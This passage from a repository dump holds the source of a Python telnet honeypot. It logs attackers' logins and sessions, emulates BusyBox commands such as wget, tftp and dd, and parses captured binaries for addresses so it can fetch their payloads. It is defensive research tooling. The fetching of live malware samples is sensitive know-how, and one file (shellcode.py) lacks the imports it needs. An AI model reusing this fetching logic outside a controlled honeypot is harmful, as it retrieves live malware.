timeout=20.0)\n\t\texcept requests.exceptions.RequestException:\n\t\t\tdbg(\"Cannot connect to backend\")\n\t\t\treturn\n\t\t\n\t\tif r.status_code == 200:\n\t\t\treturn\n\t\telif retry:\n\t\t\tmsg = r.raw.read()\n\t\t\tdbg(\"Backend upload failed, retrying (\" + str(msg) + \")\")\n\t\t\treturn self.put_sample(sha256, filename, False)\n\t\telse:\n\t\t\tmsg = r.raw.read()\n\t\t\traise IOError(msg)\n\n"
  },
  {
    "path": "honeypot/sampledb_client.py",
    "content": "import client\nimport time\nimport traceback\nimport os\nimport requests\nimport hashlib\nimport json\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nBACKEND = None\n\ndef get_backend():\n\tglobal BACKEND\n\n\tif BACKEND != None:\n\t\treturn BACKEND\n\telif config.get(\"backend\", optional=True) != None:\n\t\tBACKEND = client.Client()\n\t\treturn BACKEND\n\telse:\n\t\treturn None\n\ndef sha256(data):\n    h = hashlib.sha256()\n    h.update(data)\n    return h.hexdigest()\n    \nclass SampleRecord:\n\n\tdef __init__(self, url, name, info, data):\n\t\tself.url    = url\n\t\tself.name   = name\n\t\tself.date   = int(time.time())\n\t\tself.info   = info\n\t\tself.data   = data\n\t\tif data:\n\t\t\tself.sha256 = sha256(data)\n\t\t\tself.length = len(data)\n\t\telse:\n\t\t\tself.sha256 = None\n\t\t\tself.length = None\n\t\n\tdef json(self):\n\t\treturn {\n\t\t\t\"type\":   \"sample\",\n\t\t\t\"url\":    self.url,\n\t\t\t\"name\":   self.name,\n\t\t\t\"date\":   self.date,\n\t\t\t\"sha256\": self.sha256,\n\t\t\t\"info\":   self.info,\n\t\t\t\"length\": self.length\n\t\t}\n\nclass SessionRecord:\n\n\tdef __init__(self):\n\t\tself.back        = get_backend()\n\t\tself.logfile     = config.get(\"log_raw\",     optional=True)\n\t\tself.log_samples = config.get(\"log_samples\", optional=True, default=False)\n\t\tself.sample_dir  = config.get(\"sample_dir\",  optional=not(self.log_samples))\n\t\n\t\tself.urlset = {}\n\t\t\n\t\tself.ip = None\n\t\tself.user = None\n\t\tself.password = None\n\t\tself.date = None\n\t\tself.urls = []\n\t\tself.stream = []\n\t\t\n\tdef log_raw(self, obj):\n\t\tif self.logfile != None:\n\t\t\twith open(self.logfile, \"ab\") as fp:\n\t\t\t\tfp.write(json.dumps(obj).replace(\"\\n\", \"\") + \"\\n\")\n\t\t\n\t\t\n\tdef json(self):\n\t\treturn {\n\t\t\t\"type\"          : \"connection\",\n\t\t\t\"ip\"            : self.ip,\n\t\t\t\"user\"          : self.user,\n\t\t\t\"pass\"          : self.password,\n\t\t\t\"date\"        
  : self.date,\n\t\t\t\"stream\"        : self.stream,\n\t\t\t\"samples\"       : map(lambda sample: sample.json(), self.urls),\n\t\t}\n\n\tdef addInput(self, text):\n\t\tself.stream.append({\n\t\t\t\"in\":   True,\n\t\t\t\"ts\":   round((time.time() - self.date) * 1000) / 1000,\n\t\t\t\"data\": text.decode('ascii', 'ignore')\n\t\t})\n\n\tdef addOutput(self, text):\n\t\tself.stream.append({\n\t\t\t\"in\":   False,\n\t\t\t\"ts\":   round((time.time() - self.date) * 1000) / 1000,\n\t\t\t\"data\": text.decode('ascii', 'ignore')\n\t\t})\n\n\tdef set_login(self, ip, user, password):\n\t\tself.ip       = ip\n\t\tself.user     = user\n\t\tself.password = password\n\t\tself.date     = int(time.time())\n\t\n\tdef add_file(self, data, url=None, name=None, info=None):\n\t\tif url == None:\n\t\t\tshahash = sha256(data)\n\t\t\t# Hack, must be unique somehow, so just use the hash ...\"\n\t\t\turl = \"telnet://\" + self.ip + \"/\" + shahash[0:8]\n\t\tif name == None:\n\t\t\tname = url.split(\"/\")[-1].strip()\n\n\t\tsample = SampleRecord(url, name, info, data)\n\t\tself.urlset[url] = sample\n\t\tself.urls.append(sample)\n\n\tdef commit(self):\n\t\tself.log_raw(self.json())\n\n\t\tif self.log_samples:\n\t\t\tfor sample in self.urls:\n\t\t\t\tif sample.data:\n\t\t\t\t\tfp = open(self.sample_dir + \"/\" + sample.sha256, \"wb\")\n\t\t\t\t\tfp.write(sample.data)\n\t\t\t\t\tfp.close()\n\t\n\t\t# Ignore connections without any input\n\t\tif len(self.stream) > 1 and self.back != None:\n\t\t\tupload_req = self.back.put_session(self.json())\n\n\n"
  },
  {
    "path": "honeypot/session.py",
    "content": "import re\nimport random\nimport time\nimport json\nimport traceback\n\nimport struct\nimport socket\nimport select\nimport errno\n\nfrom util.dbg    import dbg\nfrom util.config import config\n\nfrom sampledb_client import SessionRecord\n\nfrom shell.shell import Env, run\n\nMIN_FILE_SIZE = 128\nPROMPT = \" # \"\n\t\t\t\nclass Session:\n\tdef __init__(self, output, remote_addr):\n\t\tdbg(\"New Session\")\n\t\tself.output      = output\n\t\t\n\t\tself.remote_addr = remote_addr\n\t\tself.record      = SessionRecord()\n\t\tself.env         = Env(self.send_string)\n\n\t\tself.env.listen(\"download\", self.download)\n\n\t\t# Files already commited\n\t\tself.files = []\n\n\tdef login(self, user, password):\n\t\tdbg(\"Session login: user=\" + user + \" password=\" + password)\n\t\tself.record.set_login(self.remote_addr, user, password)\n\t\t\n\t\tself.send_string(PROMPT)\n\n\tdef download(self, data):\n\t\tpath = data[\"path\"]\n\t\turl  = data[\"url\"]\n\t\tinfo = data[\"info\"]\n\t\tdata = data[\"data\"]\n\n\t\tdbg(\"Downloaded \" + url + \" to \" + path)\n\n\t\tif data:\n\t\t\tself.record.add_file(data, url=url, name=path, info=info)\n\t\t\tself.files.append(path)\n\t\telse:\n\t\t\tself.record.add_file(None, url=url, name=path, info=info)\n\t\t\t\n\tdef found_file(self, path, data):\n\t\tif path in self.files:\n\t\t\tpass\n\t\telse:\n\t\t\tif len(data) > MIN_FILE_SIZE:\n\t\t\t\tdbg(\"File created: \" + path)\n\t\t\t\tself.record.add_file(data, name=path)\n\t\t\telse:\n\t\t\t\tdbg(\"Ignore small file: \" + path + \" (\" + str(len(data)) + \") bytes\")\n\t\t\n\n\tdef end(self):\n\t\tdbg(\"Session End\")\n\t\n\t\tfor path in self.env.files:\n\t\t\tself.found_file(path, self.env.files[path])\n\t\t\t\n\t\tfor (path, data) in self.env.deleted:\n\t\t\tself.found_file(path, data)\n\t\n\t\tself.record.commit()\n\n\tdef send_string(self, text):\n\t\tself.record.addOutput(text)\n\t\tself.output(text)\n\n\tdef shell(self, l):\n\t\tself.record.addInput(l + 
\"\\n\")\n\t\n\t\ttry:\n\t\t\ttree = run(l, self.env)\n\t\texcept:\n\t\t\tdbg(\"Could not parse \\\"\"+l+\"\\\"\")\n\t\t\tself.send_string(\"sh: syntax error near unexpected token `\" + \" \" + \"'\\n\")\n\t\t\ttraceback.print_exc()\n\t\t\n\t\tself.send_string(PROMPT)\n\n"
  },
  {
    "path": "honeypot/shell/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/shell/commands/__init__.py",
    "content": ""
  },
  {
    "path": "honeypot/shell/commands/base.py",
    "content": "import sys\nimport traceback\n\nfrom binary import run_binary\n\nclass Proc:\n    procs = {}\n\n    @staticmethod\n    def register(name, obj):\n        Proc.procs[name] = obj\n\n    @staticmethod\n    def get(name):\n        if name in Proc.procs:\n            return Proc.procs[name]\n        else:\n            return None\n\nclass StaticProc(Proc):\n    def __init__(self, output, result=0):\n        self.output = output\n        self.result = result\n\n    def run(self, env, args):\n        env.write(self.output)\n        return self.result\n\nclass FuncProc(Proc):\n    def __init__(self, func):\n        self.func = func\n\n    def run(self, env, args):\n        env.write(self.func(args))\n        return 0\n\n# Basic Procs\n\nclass Exec(Proc):\n\n    def run(self, env, args):\n        if len(args) == 0:\n            return 0\n        \n        if args[0][0] == \">\":\n            name = \"true\"\n        elif args[0].startswith(\"./\"):\n            fname = args[0][2:]\n            fdata = env.readFile(fname)\n            \n            if fdata == None:\n                env.write(\"sh: 1: ./\" + fname + \": not found\\n\")\n                return 1\n            else:\n                run_binary(fdata, fname, args[1:], env)\n                return 0\n        else:\n            name = args[0]\n            args = args[1:]\n\n        # $path = /bin/\n        if name.startswith(\"/bin/\"):\n            name = name[5:]\n\n        if Proc.get(name):\n            try:\n                return Proc.get(name).run(env, args)\n            except:\n                traceback.print_exc()\n                env.write(\"Segmention fault\\n\")\n                return 1\n        else:\n            env.write(name + \": command not found\\n\")\n            return 1\n\nclass BusyBox(Proc):\n\n    def run(self, env, args):\n        \n        if len(args) == 0:\n            env.write(\"\"\"BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary.\nBusyBox is copyrighted 
by many authors between 1998-2015.\nLicensed under GPLv2. See source distribution for detailed\ncopyright notices.\n\nUsage: busybox [function [arguments]...]\n\nCurrently defined functions:\n    \"\"\" + \" \".join(Proc.procs.keys()) + \"\\n\\n\")\n            return 0\n\n        name = args[0]\n        args = args[1:]\n        if Proc.get(name):\n            return Proc.get(name).run(env, args)\n        else:\n            env.write(name + \": applet not found\\n\")\n            return 1\n\nclass Cat(Proc):\n    \n    def run(self, env, args):\n        fname = args[0]\n        string = env.readFile(fname)\n        if string != None:\n            env.write(string)\n            return 0\n        else:\n            env.write(\"cat: \" + fname + \": No such file or directory\\n\")\n            return 1\n\nclass Echo(Proc):\n\n    def run(self, env, args):\n        opts = \"\"\n        if args[0][0] == \"-\":\n            opts = args[0][1:]\n            args = args[1:]\n\n        string = \" \".join(args)\n        if \"e\" in opts:\n            string = string.decode('string_escape')\n\n        env.write(string)\n\n        if not(\"n\" in opts):\n            env.write(\"\\n\")\n\n        return 0\n\nclass Rm(Proc):\n\n    def run(self, env, args):\n        if args[0] in env.listfiles():\n            env.deleteFile(args[0])\n            return 0\n        else:\n            env.write(\"rm: cannot remove '\" + args[0] + \"': No such file or directory\\n\")\n            return 1\n\nclass Ls(Proc):\n\n    def run(self, env, args):\n        for f in env.listfiles().keys():\n            env.write(f + \"\\n\")\n        return 0\n\nclass Dd(Proc):\n\n    def run(self, env, args):\n        infile  = None\n        outfile = None\n        count   = None\n        bs      = 512\n        for a in args:\n            if a.startswith(\"if=\"):\n                infile = a[3:]\n            if a.startswith(\"of=\"):\n                outfile = a[3:]\n            if 
a.startswith(\"count=\"):\n                count = int(a[6:])\n            if a.startswith(\"bs=\"):\n                bs = int(a[3:])\n        \n        if infile != None:\n            data = env.readFile(infile)\n            if count != None:\n                data = data[0:(count*bs)]\n            if outfile:\n                env.deleteFile(infile)\n                env.writeFile(infile, data)\n            else:\n                env.write(data)\n\n        env.write(\"\"\"0+0 records in\n0+0 records out\n0 bytes copied, 0 s, 0,0 kB/s\\n\"\"\")\n        return 0\n\nclass Cp(Proc):\n\n    def run(self, env, args):\n        infile  = args[0]\n        outfile = args[1]\n        \n        data = env.readFile(infile)\n        if data != None:\n            env.writeFile(outfile, data)\n            return 0\n        else:\n            env.write(\"cp: cannot stat '\" + infile + \"': No such file or directory\\n\")\n            return 1\n\nProc.register(\"cp\",      Cp())\nProc.register(\"ls\",      Ls())\nProc.register(\"cat\",     Cat())\nProc.register(\"dd\",      Dd())\nProc.register(\"rm\",      Rm())\nProc.register(\"echo\",    Echo())\nProc.register(\"busybox\", BusyBox())\nProc.register(\"exec\",    Exec())\n\nProc.register(\"cd\",      StaticProc(\"\"))\nProc.register(\"true\",    StaticProc(\"\"))\nProc.register(\"chmod\",   StaticProc(\"\"))\nProc.register(\"uname\",   StaticProc(\"\"))\nProc.register(\":\",       StaticProc(\"\"))\nProc.register(\"ps\",      StaticProc(\n\"\"\"  PID TTY          TIME CMD\n 6467 pts/0    00:00:00 sh\n12013 pts/0    00:00:00 ps\\n\"\"\"))\n\n# Other files\n\nfrom wget  import Wget\nfrom shell import Shell\n\n# tftp disabled\n#from tftp import Tftp\n\n\n"
  },
  {
    "path": "honeypot/shell/commands/binary.py",
    "content": "\nimport socket\nimport struct\nimport select\n\ndef dbg(s):\n    print s\n\ndef run_binary(data, fname, args, env):\n    dbg(\"Parsing binary file \" + fname + \" (\" + str(len(data)) + \" bytes)\")\n    \n    socks  = []\n    tuples = []\n    pos    = 0\n    while True:\n        pos = data.find(\"\\x02\\x00\", pos)\n        if pos == -1: break\n        \n        sockaddr = data[pos:pos+8]\n        sockaddr = struct.unpack(\">HHBBBB\", sockaddr)\n        pos += 8\n        \n        # Ignore ip addresses starting with 0 or > 224 (multicast)\n        if (sockaddr[2] == 0 or sockaddr[2] >= 224):\n            continue\n        \n        ip   = str(sockaddr[2]) + \".\" + str(sockaddr[3]) + \".\" + str(sockaddr[4]) + \".\" + str(sockaddr[5])\n        port = sockaddr[1]\n        tuples.append((ip, port))\n\n    for addr in tuples:\n        try:\n            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            s.settimeout(15)\n            s.setblocking(0)\n            s.connect_ex(addr)\n            socks.append(s)\n            dbg(\"Trying tcp://\" + addr[0] + \":\" + str(addr[1]))\n        except:\n            pass\n    \n    goodsocket = None\n    data       = None\n    url        = None\n    while len(socks) > 0:\n        read, a, b = select.select(socks, [], [], 15)\n        if len(read) == 0: break\n        for s in read:\n            if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:\n                try:\n                    s.setblocking(1)\n                    data = s.recv(1024)\n                    goodsocket = s\n                    peer = s.getpeername()\n                    url  = \"tcp://\" + peer[0] + \":\" + str(peer[1])\n                    dbg(\"Connected to \" + url)\n                    break\n                except:\n                    s.close()\n                    socks.remove(s)\n            else:\n                s.close()\n                socks.remove(s)\n        if goodsocket != None:\n            
break\n\n    for s in socks:\n        if s != goodsocket:\n            s.close()\n    \n    if goodsocket == None:\n        dbg(\"Could not connect.\\n\")\n        #for addr in tuples:\n        #    env.write(tuples[0] + \":\" + tuples[1] + \"\\n\")\n        return 1\n\n    while True:\n        r = goodsocket.recv(1024)\n        if r != \"\":\n            data += r\n        else:\n            break\n    \n    goodsocket.close()\n    \n    # Normally these stub downloaders will output to stdout\n    env.write(data)\n    \n    env.action(\"download\", {\n        \"url\":  url,\n        \"path\": \"(stdout)\",\n        \"info\": \"\",\n        \"data\": data\n    })\n    \n    return 0\n"
  },
  {
    "path": "honeypot/shell/commands/cmd_util.py",
    "content": "from getopt import gnu_getopt, GetoptError\n\ndef easy_getopt(args, opt, longopts=[]):\n\toptlist, args = gnu_getopt(args, opt, longopts)\n\toptdict = {}\n\t\n\tfor item in optlist:\n\t\toptdict[item[0]] = item[1]\n\t\t\n\treturn optdict, args\n\n"
  },
  {
    "path": "honeypot/shell/commands/shell.py",
    "content": "from base import Proc\n\nclass Shell(Proc):\n    \n    def run(self, env, args):\n        from honeypot.shell.shell import run\n        \n        if len(args) == 0:\n            env.write(\"Busybox built-in shell (ash)\\n\")\n            return 0\n        \n        fname = args[0]\n        contents = env.readFile(fname)\n        \n        if contents == None:\n            env.write(\"sh: 0: Can't open \" + fname)\n            return 1\n        else:\n            shell = Proc.get(\"exec\")\n            for line in contents.split(\"\\n\"):\n                line = line.strip()\n                line = line.split(\"#\")[0]\n                run(line, env)\n            return 0\n\nProc.register(\"sh\", Shell())\n"
  },
  {
    "path": "honeypot/shell/commands/shellcode.py",
    "content": "\nfrom base     import Proc\n\nclass Shellcode():\n\n\tdef run(self, data):\n\t\tdbg(\"Parsing stub downloader (\" + str(len(data)) + \" bytes)\")\n\n\t\tsocks  = []\n\t\ttuples = []\n\t\tpos    = 0\n\t\twhile True:\n\t\t\tpos = data.find(\"\\x02\\x00\", pos)\n\t\t\tif pos == -1: break\n\t\t\t\n\t\t\tsockaddr = data[pos:pos+8]\n\t\t\tsockaddr = struct.unpack(\">HHBBBB\", sockaddr)\n\t\t\t\n\t\t\tip   = str(sockaddr[2]) + \".\" + str(sockaddr[3]) + \".\" + str(sockaddr[4]) + \".\" + str(sockaddr[5])\n\t\t\tport = sockaddr[1]\t\t\n\t\t\ttuples.append((ip, port))\n\t\t\tpos += 8\n\n\t\tfor addr in tuples:\n\t\t\ttry:\n\t\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\t\ts.settimeout(15)\n\t\t\t\ts.setblocking(0)\n\t\t\t\ts.connect_ex(addr)\n\t\t\t\tsocks.append(s)\n\t\t\t\tdbg(\"Trying tcp://\" + addr[0] + \":\" + str(addr[1]))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\n\t\tgoodsocket = None\n\t\tdata       = None\n\t\turl        = None\n\t\twhile len(socks) > 0:\n\t\t\tread, a, b = select.select(socks, [], [], 15)\n\t\t\tif len(read) == 0: break\n\t\t\tfor s in read:\n\t\t\t\tif s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:\n\t\t\t\t\ttry:\n\t\t\t\t\t\ts.setblocking(1)\n\t\t\t\t\t\tdata = s.recv(1024)\n\t\t\t\t\t\tgoodsocket = s\n\t\t\t\t\t\tpeer = s.getpeername()\n\t\t\t\t\t\turl  = \"tcp://\" + peer[0] + \":\" + str(peer[1])\n\t\t\t\t\t\tdbg(\"Connected to \" + url)\n\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\ts.close()\n\t\t\t\t\t\tsocks.remove(s)\n\t\t\t\telse:\n\t\t\t\t\ts.close()\n\t\t\t\t\tsocks.remove(s)\n\t\t\tif goodsocket != None:\n\t\t\t\tbreak\n\n\t\tfor s in socks:\n\t\t\tif s != goodsocket:\n\t\t\t\ts.close()\n\t\t\n\t\tif goodsocket == None:\n\t\t\tdbg(\"Could not connect to any addresses in binary.\")\n\t\t\treturn\n\n\t\twhile True:\n\t\t\tr = goodsocket.recv(1024)\n\t\t\tif r != \"\":\n\t\t\t\tdata += r\n\t\t\telse:\n\t\t\t\tbreak\n\t\t\n\t\tgoodsocket.close()\n\t\tself.record.add_file(data, url=url)\n"
  },
  {
    "path": "honeypot/shell/commands/tftp.py",
    "content": "#!/usr/bin/env python\n\nimport io\nimport traceback\n\nfrom getopt import gnu_getopt, GetoptError\nfrom tftpy  import TftpClient\n\nfrom cmd_util import easy_getopt\nfrom base     import Proc\n\nfrom util.config import config\n\nclass DummyIO(io.RawIOBase):\n\t\n\tdef __init__(self):\n\t\tself.data = \"\"\n\t\t\n\tdef write(self, s):\n\t\tself.data += s\n\t\t\nclass StaticTftp(Proc):\n\n\tdef run(self, env, args):\n\t\tTftp().run(env, args)\t\n\nclass Tftp:\n\n\thelp = \"\"\"BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary.\n\nUsage: tftp [OPTIONS] HOST [PORT]\n\nTransfer a file from/to tftp server\n\n\t-l FILE\tLocal FILE\n\t-r FILE\tRemote FILE\n\t-g\tGet file\n\t-p\tPut file\n\t-b SIZE\tTransfer blocks of SIZE octets\n\n\"\"\"\n\n\tdef run(self, env, args):\n\t\tself.env       = env\n\t\tself.connected = False\n\t\tself.chunks    = 0\n\t\n\t\ttry:\n\t\t\topts, args = easy_getopt(args, \"l:r:gpb:\")\n\t\texcept GetoptError as e:\n\t\t\tenv.write(\"tftp: \" + str(e) + \"\\n\")\n\t\t\tenv.write(Tftp.help)\n\t\t\treturn\n\t\t\n\t\tif len(args) == 0:\n\t\t\tenv.write(Tftp.help)\n\t\t\treturn\n\t\telif len(args) == 1:\n\t\t\thost = args[0]\n\t\t\tport = 69\n\t\t\t\n\t\t\tif \":\" in host:\n\t\t\t\tparts = host.split(\":\")\n\t\t\t\thost  = parts[0]\n\t\t\t\tport  = int(parts[1])\n\t\t\t\n\t\telse:\n\t\t\thost = args[0]\n\t\t\tport = int(args[1])\n\t\t\t\n\t\tif \"-p\" in opts:\n\t\t\tenv.write(\"tftp: option 'p' not implemented\\n\")\n\t\t\treturn\n\t\tif \"-b\" in opts:\n\t\t\tenv.write(\"tftp: option 'b' not implemented\\n\")\n\t\t\treturn\n\t\t\n\t\tif \"-r\" in opts:\n\t\t\tpath = opts[\"-r\"]\n\t\telse:\n\t\t\tprint Tftp.help\n\t\t\treturn\n\t\t\t\n\t\tif \"-l\" in opts:\n\t\t\tfname = opts[\"-l\"]\n\t\telse:\n\t\t\tfname = path\n\t\t\n\t\ttry:\n\t\t\tdata = self.download(host, port, path)\n\t\t\tenv.writeFile(fname, data)\n\n\t\t\tenv.action(\"download\", {\n\t\t\t\t\"url\":  \"tftp://\" + host + \":\" + str(port) + \"/\" + 
path,\n\t\t\t\t\"path\": fname,\n\t\t\t\t\"info\": None,\n\t\t\t\t\"data\": data\n\t\t\t})\n\t\t\t\n\t\t\tself.env.write(\"\\nFinished. Saved to \" + fname + \".\\n\")\n\t\texcept:\n\t\t\tenv.write(\"tftp: timeout\\n\")\n\t\t\tenv.action(\"download\", {\n\t\t\t\t\"url\":  \"tftp://\" + host + \":\" + str(port) + \"/\" + path,\n\t\t\t\t\"path\": fname,\n\t\t\t\t\"info\": None,\n\t\t\t\t\"data\": None\n\t\t\t})\n\n\tdef download(self, host, port, fname):\n\t\tif config.get(\"fake_dl\", optional=True, default=False):\n\t\t\treturn str(hash(host + str(port) + fname))\n\t\t\t\n\t\toutput = DummyIO()\n\t\tclient = TftpClient(host, port)\n\t\t\n\t\tself.env.write(\"Trying \" + host + \":\" + str(port) + \" ... \")\n\t\tclient.download(fname, output, timeout=5, packethook=self.pkt)\n\t\treturn output.data\n\t\t\n\tdef pkt(self, data):\n\t\tif not(self.connected):\n\t\t\tself.env.write(\"OK\\n\")\n\t\t\tself.connected = True\n\t\t#if self.chunks % 60 == 0:\n\t\t#\tself.env.write(\"\\n\")\n\t\tself.chunks += 1\n\t\t#self.env.write(\".\")\n\nProc.register(\"tftp\", StaticTftp())\n\n"
  },
  {
    "path": "honeypot/shell/commands/wget.py",
    "content": "\nimport requests\nimport traceback\nimport datetime\nimport urlparse\n\nfrom util.config import config\n\nfrom base     import Proc\n\nclass Wget(Proc):\n\n\tdef dl(self, env, url, path=None, echo=True):\n\t\tu = urlparse.urlparse(url)\n\t\t\n\t\thost  = u.hostname\n\t\tip    = \"127.0.0.1\"\n\t\tport  = u.port if u.port else 80\n\t\tdate  = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\t\tif echo:\n\t\t    env.write(\"--\"+date+\"--  \" + url + \"\\n\")\n\t\t    env.write(\"Resolving \" + host + \" (\" + host + \")... \" + ip + \"\\n\")\n\t\t    env.write(\"Connecting to  \" + host + \" (\" + host + \")|\" + ip + \"|:\" + str(port) + \"...\")\n\t\t    \n\t\tif path == None:\n\t\t\tpath = url.split(\"/\")[-1].strip()\n\t\tif path == \"\":\n\t\t\tpath = \"index.html\"\n\n\t\tif config.get(\"fake_dl\", optional=True, default=False):\n\t\t\tdata = str(hash(url))\n\t\t\tinfo = \"\"\n\t\telse:\n\t\t\thdr = { \"User-Agent\" : \"Wget/1.15 (linux-gnu)\" }\n\t\t\tr   = None\n\t\t\ttry:\n\t\t\t\tr = requests.get(url, stream=True, timeout=5.0, headers=hdr)\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" connected\\n\")\n\t\t\t\t\tenv.write(\"HTTP request sent, awaiting response... 200 OK\\n\")\n\t\t\t\t\tenv.write(\"Length: unspecified [text/html]\\n\")\n\t\t\t\t\tenv.write(\"Saving to: '\"+path+\"'\\n\\n\")\n\t\t\t\t\tenv.write(\"     0K .......... 
7,18M=0,001s\\n\\n\")\n\t\t\t\t\tenv.write(date+\" (7,18 MB/s) - '\"+path+\"' saved [11213]\\n\")\n\n\t\t\t\tdata = \"\"\n\t\t\t\tfor chunk in r.iter_content(chunk_size = 4096):\n\t\t\t\t\tdata = data + chunk\n\n\t\t\t\tinfo = \"\"\n\t\t\t\tfor his in r.history:\n\t\t\t\t\tinfo = info + \"HTTP \" + str(his.status_code) + \"\\n\"\n\t\t\t\t\tfor k,v in his.headers.iteritems():\n\t\t\t\t\t\tinfo = info + k + \": \" + v + \"\\n\"\n\t\t\t\t\t\tinfo = info + \"\\n\"\n\n\t\t\t\tinfo = info + \"HTTP \" + str(r.status_code) + \"\\n\"\n\t\t\t\tfor k,v in r.headers.iteritems():\n\t\t\t\t\tinfo = info + k + \": \" + v + \"\\n\"\n\t\t\texcept requests.ConnectTimeout as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Connection timed out.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept requests.ConnectionError as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Connection refused.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept requests.ReadTimeout as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: Read timeout.\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\texcept Exception as e:\n\t\t\t\tdata = None\n\t\t\t\tinfo = \"Download failed\"\n\t\t\t\tif echo:\n\t\t\t\t\tenv.write(\" failed: \" + str(e.message) + \".\\n\")\n\t\t\t\t\tenv.write(\"Giving up.\\n\\n\")\n\t\t\t\t\n\n\t\tif data:\n\t\t\tenv.writeFile(path, data)\n\t\t\n\t\tenv.action(\"download\", {\n\t\t    \"url\":  url,\n\t\t    \"path\": path,\n\t\t    \"info\": info,\n\t\t    \"data\": data\n\t\t})\n\n\tdef run(self, env, args):\n\t\tif len(args) == 0:\n\t\t    env.write(\"\"\"BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary.\n\nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]\n\t[--header 'header: value'] [-Y|--proxy on/off] [-P 
DIR]\n\t[-U|--user-agent AGENT] URL...\n\nRetrieve files via HTTP or FTP\n\n\t-s\tSpider mode - only check file existence\n\t-c\tContinue retrieval of aborted transfer\n\t-q\tQuiet\n\t-P DIR\tSave to DIR (default .)\n\t-O FILE\tSave to FILE ('-' for stdout)\n\t-U STR\tUse STR for User-Agent header\n\t-Y\tUse proxy ('on' or 'off')\n\n\"\"\")\n\t\t    return 1\n\t\telse:\n\t\t    echo = True\n\t\t    for arg in args:\n\t\t        if arg == \"-O\":\n\t\t            echo = False\n\t\t    for url in args:\n\t\t        if url.startswith(\"http\"):\n\t\t            self.dl(env, url, echo=echo)\n\t\t    return 0\n\nProc.register(\"wget\", Wget())\n"
  },
  {
    "path": "honeypot/shell/grammar.peg",
    "content": "grammar cmd\n\ncmd        <- cmdlist / empty\ncmdlist    <- cmdsingle (sep (\";\" / \"&\") sep cmdlist)?                                           %make_list\ncmdsingle  <- cmdpipe  (sep (\"||\" / \"&&\") sep cmdsingle)?                                        %make_single\ncmdpipe    <- cmdredir  (sep (\"|\" !\"|\") sep cmdpipe)?                                            %make_pipe\ncmdredir   <- cmdargs ( sep (\">>-\" / \">>\" / \"<<\" / \"<>\" / \"<&\" / \">&\" / \"<\" / \">\") sep arg )*    %make_redir\ncmdargs    <- cmdbrac / args \ncmdbrac    <- \"(\" sep cmd sep \")\"                                                                %make_cmdbrac\nargs       <- arg (\" \"+ arg)*                                                                    %make_args\n\narg        <-  arg_quot1 / arg_quot2 / arg_noquot / empty\narg_noempty <-  arg_quot1 / arg_quot2 / arg_noquot\narg_quot1  <-  \"'\" [^']* \"'\"                                  %make_arg_quot\narg_quot2  <-  '\"' [^\"]* '\"'                                  %make_arg_quot\narg_noquot <-  [^ ;|&()\"'><]+                                 %make_arg_noquot\n\nempty      <-  \"\"?\nsep        <- \" \"*\n"
  },
  {
    "path": "honeypot/shell/grammar.py",
    "content": "from collections import defaultdict\nimport re\n\n\nclass TreeNode(object):\n    def __init__(self, text, offset, elements=None):\n        self.text = text\n        self.offset = offset\n        self.elements = elements or []\n\n    def __iter__(self):\n        for el in self.elements:\n            yield el\n\n\nclass TreeNode1(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode1, self).__init__(text, offset, elements)\n        self.cmdsingle = elements[0]\n\n\nclass TreeNode2(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode2, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdlist = elements[3]\n\n\nclass TreeNode3(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode3, self).__init__(text, offset, elements)\n        self.cmdpipe = elements[0]\n\n\nclass TreeNode4(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode4, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdsingle = elements[3]\n\n\nclass TreeNode5(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode5, self).__init__(text, offset, elements)\n        self.cmdredir = elements[0]\n\n\nclass TreeNode6(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode6, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.cmdpipe = elements[3]\n\n\nclass TreeNode7(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode7, self).__init__(text, offset, elements)\n        self.cmdargs = elements[0]\n\n\nclass TreeNode8(TreeNode):\n    def __init__(self, text, offset, elements):\n        super(TreeNode8, self).__init__(text, offset, elements)\n        self.sep = elements[2]\n        self.arg = elements[3]\n\n\nclass TreeNode9(TreeNode):\n    def __init__(self, text, offset, elements):\n        
